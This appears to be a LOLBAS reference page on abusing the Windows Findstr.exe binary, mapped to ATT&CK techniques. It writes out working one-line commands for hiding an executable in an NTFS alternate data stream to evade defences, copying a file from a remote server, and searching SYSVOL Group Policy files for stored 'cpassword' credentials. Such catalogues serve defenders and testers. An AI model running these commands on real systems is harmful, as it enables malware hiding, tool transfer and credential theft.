.. /Findstr.exe
Star

Alternate data streams
Credentials
Download

Write to ADS, discover, or download files with Findstr.exe

Paths:

Resources:

Acknowledgements:

Detections:

Alternate data streams

  1. Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.

    findstr /V /L W3AllLov3LolBas C:\Windows\Temp\file.exe > C:\Windows\Temp\file.ext:file.exe
    Use case
    Add a file to an alternate data stream to hide from defensive counter measures
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1564.004: NTFS File Attributes
  2. Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.

    findstr /V /L W3AllLov3LolBas \\servername\C$\Windows\Temp\file.exe > C:\Windows\Temp\file.ext:file.exe
    Use case
    Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1564.004: NTFS File Attributes

Credentials

  1. Search for stored password in Group Policy files stored on SYSVOL.

    findstr /S /I cpassword \\sysvol\policies\*.xml
    Use case
    Find credentials stored in cpassword attrbute
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1552.001: Credentials In Files

Download

  1. Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.

    findstr /V /L W3AllLov3LolBas \\servername\C$\Windows\Temp\file.exe > C:\Windows\Temp\file.exe
    Use case
    Download/Copy file from webdav server
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1105: Ingress Tool Transfer